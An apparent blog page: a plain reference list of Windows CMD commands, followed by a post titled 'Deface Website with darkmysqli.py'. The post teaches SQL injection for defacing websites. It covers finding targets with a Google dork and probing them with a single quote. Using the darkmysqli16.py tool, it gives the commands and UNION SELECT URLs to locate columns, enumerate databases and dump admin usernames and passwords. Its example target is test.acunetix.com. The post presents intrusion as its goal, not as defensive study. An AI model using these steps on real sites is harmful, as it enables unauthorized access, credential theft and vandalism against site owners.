SETX ==>> Set environment variables permanently
SHARE ==>> List or edit a file share or print share
SHIFT ==>> Shift the position of replaceable parameters in a batch file•
SHORTCUT ==>> Create a windows shortcut (.LNK file)
SHOWGRPS ==>> List the NT Workgroups a user has joined
SHOWMBRS ==>> List the Users who are members of a Workgroup
SHUTDOWN ==>> Shutdown the computer
SLEEP ==>> Wait for x seconds
SOON ==>> Schedule a command to run in the near future
SORT ==>> Sort input
START ==>> Start a program or command in a separate window•
SU ==>> Switch User
SUBINACL ==>> Edit file and folder Permissions, Ownership and Domain
SUBST ==>> Associate a path with a drive letter
SYSTEMINFO ==>> List system configuration

T
TASKLIST ==>> List running applications and services
TASKKILL ==>> Remove a running process from memory
TIME ==>> Display or set the system time•
TIMEOUT ==>> Delay processing of a batch file
TITLE ==>> Set the window title for a CMD.EXE session•
TLIST ==>> Task list with full path
TOUCH ==>> Change file timestamps
TRACERT ==>> Trace route to a remote host
TREE ==>> Graphical display of folder structure
TYPE ==>> Display the contents of a text file•

U
USRSTAT ==>> List domain usernames and last login

V
VER ==>> Display version information•
VERIFY ==>> Verify that files have been saved•
VOL ==>> Display a disk label•

W
WHERE ==>> Locate and display files in a directory tree
WHOAMI ==>> Output the current UserName and domain
WINDIFF ==>> Compare the contents of two files or sets of files
WINMSD ==>> Windows system diagnostics
WINMSDP ==>> Windows system diagnostics II
WMIC ==>> WMI Commands

X
XCACLS ==>> Change file and folder permissions
XCOPY ==>> Copy files and folders


Commands marked • are Internal commands only available within the CMD shell.
All other commands (NOT marked with •) are external commands which may be used under the CMD shell, PowerShell, or directly from START-RUN.
read more...

Friday, December 11, 2009

Deface Website with darkmysqli.py


Let us try to learn to deface websites with SQL injection using python software and darkmysqli.py. This time I will share some knowledge I gained from several underground forums. to deface the website by using darkmysqli.py, then we must have software python, because darkmysqli.py using python programming language.
python: python download and darkmysqli.py: darkmysqli.py download

after downloading install python and then extract darkmysqli.py in a folder.
To find the target we can use google dork, such as:
"inurl: artists.php? id =" (without quotes),

And we get a target: http://test.acunetix.com/artists.php?artist=1
Do not forget to add a single quote ( ') in the browser, to find weaknesses

Using darkmysqli16.py:
Find column using --findcol
exp: exp: darkmysqli16.py -u “http://test.acunetix.com/artists.php?artist=1″ –findcol
like this:


results obtained
http://test.acunetix.com/artists.php?artist=1+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de–

then we enter the commands that we can, search the database and table names with: "--full"
exp: darkmysqli16.py -u “http://test.acunetix.com/artists.php?artist=1+AND+1=2+UNION+SELECT+1,darkc0de,darkc0de,darkc0de–” –full
once obtained the name of the database and under tabbel like this:



to find for a username and password are admin website with:
–dump -D (database name) -T (table name) -C (coloumn name)

exp: darkmysqli16.py -u http://test.acunetix.comartists.php?artist=1+AND+1=2+UNION+SELECT+1,darkc0de,3–” –dump -D acuart -T users -C uname, pass

like this:


and finally a we get the username and password that website.

from: my other blog
read more...